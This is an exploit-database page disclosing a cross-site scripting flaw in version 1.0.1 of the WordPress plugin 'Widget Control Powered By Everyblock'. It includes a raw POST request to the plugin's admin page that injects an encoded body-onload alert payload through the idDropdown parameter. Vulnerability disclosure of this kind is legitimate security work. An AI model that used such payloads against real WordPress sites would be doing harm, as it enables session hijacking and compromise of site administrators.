Home / exploits

PDF

WordPress Widget Control 1.0.1 Cross Site Scripting

Posted on 27 February 2014

# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================

# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52

idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

 

TOP